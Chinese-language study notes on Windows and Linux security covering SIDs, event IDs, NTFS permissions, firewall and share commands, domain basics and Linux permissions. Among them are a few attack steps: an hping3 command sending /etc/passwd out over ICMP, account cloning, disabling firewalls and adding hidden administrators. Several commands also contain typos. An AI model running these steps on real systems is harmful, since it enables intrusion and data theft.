#操作系统安全

#WIndows操作系统安全

windows的用户标识:SID

1
2
3
4
5
6
7
administartor:500--0x1f4
guest:501--ox1f5
普通用户:从1000开始--ox3e8
内置账号:
	system
    local service
    network service

C:\windows\system32\config\SAM
HKEY_LOCAL+MACHINE\SAM\SAM\Domains\Account\Users\Names
查看用户SID:whoami/user
查看组SID:whoami/groups
查看用户特权:whoami/priv
查看服务SID:sc showsid server_name

用户克隆:把管理员F值赋值到普通用户上
信道保护:记时 存储
hping3 ip_address -d size –icmp –file /etc/passwd //利用icmp信道传输/etc/passwd文件

知其所需,最小特权

日志:系统日志/设备日志/web日志/监控日志

系统system:

1
2
3
4
5
6
7
8
9
10
1074,查看计算机的开机、关机、重启的时间以及原因和注释。
6005,表示日志服务已启动,用来判断正常开机进入系统。
6006,表示日志服务已停止,用来判断系统关机。
6009,表示非正常关机, 按ctrl、alt、delete键关机。
41,表示系统在未先正常关机的情况下重新启动。当出现意外断电关机、系统崩溃时,出现此事件ID。
4199,当发生TCP/IP地址冲突的时候,出现此事件ID,用来排查用户IP网络的问题。
35,36,37,记录时间客户端状态信息,35表示更改时间源,36表示时间同步失败,37表示时间同步正常
134,当出现时间同步源DNS解析失败时会出现此事件ID。
7045,服务创建成功
7030,服务创建失败

安全Security:

1
2
3
4
5
4624,表示成功登陆的用户,用来筛选该系统的用户登陆成功情况。
4625,表示登陆失败的用户。
4672,表示授予了特殊权限
4720,4722,4723,4724,4725,4726,4738,4740,事件ID表示当用户帐号发生创建,删除,改变密码时的事件记录。
4727,4737,4739,4762,表示当用户组发生添加、删除时或组内添加成员时生成该事件。

Windows认证:
    本地认证:GINA-LISA-SAM-用户数据
    远程认证:SMB-LM-NTLM-Keyberos
    访问控制:(授权)
    ACL:访问控制列表
    CL:访问能力表

主体:发起访问者
客体:被访问者
权限:主体对客体的操作能力

NTFS权限:(ACL和ACE)
    仅NTFS支持
    权限累计和继承
   文件权限高于文件夹权限
   移动和复制对于权限的影响
   拒绝权限优先
   特殊权限:
   读取权限
   修改权限
   取得所有权

Windows特权管理:User Account Control
   完全访问令牌
   标准受限访问令牌

windows默认日志:
   security.evtx
   system.evtx
   application.evtx

关闭默认共享:
1.关闭临时共享:net share shared_name /del
2.永久关闭共享:net stop server
3.修改注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parametes
建立IPC连接:net use \ip\ipc$ //输入用户名和密码
建立默认共享映射:net use k: \ip\c$ //映射不存在的磁盘

关闭防火墙指令:

1
2
3
4
5
6
7
8
9
10
Win10:
关闭防火墙:netsh firewall set opmode mode=disable
开启防火墙:netsh firewall set opmode mode=enable
查看防火墙状态:netsh Advfirewall show allprofiles
防火墙恢复默认配置:netsh firewall reset
添加访问规则,允许IP 192.168.1.105通过Telnet访问主机:netsh firewall set portopening tcp 23 telnet enable custom 192.168.1.105

win2008
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on

新建用户:net user username new_passwd /add
用户加入管理员组:net localgroups administartors username /add
修改文件权限:cacals 文件路径 /G everyone:F(WRCF) /echo y|cacals 文件路径 /G everyone:F

内网渗透:
   Active Directory:活动目录
   安装域控制器条件:
   1.静态IP地址
   2.最少一个NTFS文件系统
   3.管理员权限
   4.操作系统版本支持(server2008及以前系统:dcpromo/2012及以后系统:先安全角色,再提升为dc)
   5.DNS支持
域基本概念:
   更新组策略:gpupdate /force
   域授权规则:AGDLP
   组的作用域:
   全局组:作用到全林
   通用组:作用到全林,存放在GC中
   本地域组:
   组策略应该顺序:冲突(后覆盖前)/不冲突(累加)

#Linux:

TCP_Wrappers:仅支持TCP协议
TCP_Wrappers配置文件
   /etc/hosts.allow
   /etc/hosts.deny
Liunx账号:UID/GID
Linux用户ID:
   root:0
   系统和程序用户:1-999
   普通用户:1000开始

Linux设置权限工具:
   chmod
   chown
   setfacl
   chattr

Linux默认权限设置:umask(默认值为0022)
Linux文件类型:
   -:file
   d:directory
   s:sockets
   p:pipe
   l:link
   c:character
   b:block

rw- r– r–
owner group other

Linux日志:/var/log
   message:系统日志
   dmesg:内核日志
   boot.log:启动日志